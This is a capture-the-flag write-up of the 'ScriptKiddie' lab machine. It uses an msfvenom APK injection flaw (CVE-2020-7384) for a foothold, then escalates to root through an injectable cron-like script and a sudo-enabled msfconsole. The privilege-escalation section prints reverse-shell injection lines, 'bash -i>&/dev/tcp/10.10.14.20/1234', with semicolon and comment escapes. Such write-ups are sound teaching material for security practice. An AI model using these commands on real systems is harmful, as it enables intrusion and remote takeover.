In ScriptKiddie, we compromise a server run by a pair of script kiddies with an outdated version of msfvenom and chain several misconfigurations to achieve root access.
Enumeration
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-07 15:33 UTC
Nmap scan report for 10.10.10.226
Host is up (0.19s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
| 256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_ 256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.26 seconds
NMAP shows there is an SSH server which will be quiet useful late. For now since there are no know credentials or see an obvious vulnerability take a look at the web server on port 5000.
The site is a page single page of various h4ck3r t00l5, NMAP, an msfvenom payload generator, and a search bar for Exploit DB. There doesn’t seem to be a whole lot more on the web server. Payloads can be generated and have an upload feature but outside of that and viewing the output from Exploit DB and NMAP there isn’t much on the site.
Foothold
It’s worth fuzzing by trying various special characters in the input fields for the nmap and exploit-db, and msfvenom input fields to see if there is a way to break it and achieve code execution. This doesn’t yield much and it seems there is some level of filtering in place.
However, there is another place to provide user input. The msfvenom upload. . Playing around with the parameters shows that the windows payload expects an EXE, Android expects an APK, and Linux would like an ELF. However it doens’t seem to work properly, returns that “Something went wrong”. Not super descriptive for trouble shooting.
It turns out that CVE-2020-7384 is a vulnerability in msfvenom that allows for code injection using APK template files. We find a link on the nvd.nist.gove page that links to a Metasploit module .
A module has also been included in msfconsole. Finding and configuring it is fairly trivial.
A payload is generated and then stored. Start a netcat listener, nc -lnvp 4444, and upload the malicious APK to the server.
After a few minutes of loading, the listner gets a callback.
The call back is as the user kid and they have a private SSH key in /home/kid/.ssh/id_rsaThat can be copied and pasted an attacker’s machine, permissions changed, chmod 600 kid-id_rsa and then used to SSH right in and collect user.txt
Privilege Escalation
kid doesn’t seem to be in interesting groups nor do we have credentials to try and abuse. Checking through the code of the webapp to see if there is anything that can be used.
IPs from requests that that are marked as containing special characters are entered into a hackers file that also appears to be empty. Though kid does have write permissions. Expanding the search beyond the kid’s home directory and finds another user, pwn We check out his directory and find a nicely named script called scanlosers.sh
It collects input from the hackers file found earlier. One option would be to try to provide it with input that would launch a reverse shell. An attacker can stand up a netcat listener, nc -lnvp 1234, and start trying to get a working payload.
The following is a good starting point. echo "bash -c 'bash -i>&/dev/tcp/10.10.14.20/1234 0>&1'" > /home/kid/hackers and unfortunately, nothing comes back. A space and a semi colon can be added to make sure we escape a current command. echo " ;bash -c 'bash -i>&/dev/tcp/10.10.14.20/1234 0>&1'" > /home/kid/hackers The netcat listener get’s a connection!
Which promptly dies. “ambicous redirect”
It’s likely that whatever is after the reverse shell in scanlosers.sh script is doing odd things to it. A solution is to comment it out. echo " ;bash -c 'bash -i>&/dev/tcp/10.10.14.20/1234 0>&1' # " > /home/kid/hackers Bingo. This time the call back is stable. pwn is also kind enough to have a handy SSH key.
Root
Once again, pwn doesn’t any interesting groups nor are there credentials to try but sudo -l reveals they can run a command with root privileges without authentication.
Msfconsolse can be started with root privileges. Not exactly the best sudo configuration. Launching the msfconsole we have full root privileges and nothing says we need to attack a remote target. Instead the commands can be executed directly on our current system.
Wrap Up
All in all, this was a pretty easy box and probably one of the shortest writeups I have written. That said, I really enjoyed it. In part it was nice to have a break from boxes where I had to think a lot harder and I also really enjoyed the theme of exploiting the infrastructure of a couple of Script Kiddies. Thank you very much 0xdf all the hard work you put into making this machine.
Side note: Some of you maybe wondering how scanlosers.sh was running. It seems like a cronjob but if you checked cron while enumerating, you won’t find it. It’s instead using something called incronwhich instead of being time based, is based on file system events. It runs when it detects a write to hackers, scanlosers.sh. It’s a pretty neat trick that I should find a use for someday.